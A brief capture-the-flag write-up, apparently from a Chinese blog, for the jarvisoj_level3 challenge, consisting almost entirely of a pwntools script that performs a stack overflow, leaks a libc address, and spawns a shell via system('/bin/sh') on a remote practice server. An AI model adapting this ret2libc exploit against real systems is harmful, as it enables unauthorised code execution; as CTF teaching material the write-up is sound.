pwn | jarvisoj_level3

pwn | jarvisoj_level3

x86 ret2libc

非常常规的ret2libc

exp:

from pwn import *
from LibcSearcher.LibcSearcher import *

context.log_level = 'debug'

elf = ELF('./level3')
# libc = ELF('./libc-2.23.so')   # is ok too

p_main = 0x08048484
p_plt_write = elf.plt['write']
p_got_write = elf.got['write']


# p = process('./level3')
p = remote('node4.buuoj.cn', 26805)

p.recvuntil('Input:\n')

p_str = 0x08048540

# leak the addr of write
# rubbish + p_got_write + ret_addr_of_write + write_arg1 + write_arg2 + write_arg3
payload = b'M'*(0x88+4) + p32(p_plt_write) + p32(p_main) + p32(1) + p32(p_got_write) + p32(4)

p.send(payload)

addr = u32(p.recv(4))

print(hex(addr))

libc = LibcSearcher('write', addr)
p_libc_write = libc.dump('write')
p_libc_base = addr - p_libc_write
p_system = p_libc_base + libc.dump('system')
p_binsh = p_libc_base + libc.dump('str_bin_sh')

p.recvuntil('Input:\n')

payload = b'M'*(0x88+4) + p32(p_system) + b'Mz11' + p32(p_binsh)
p.send(payload)
p.interactive()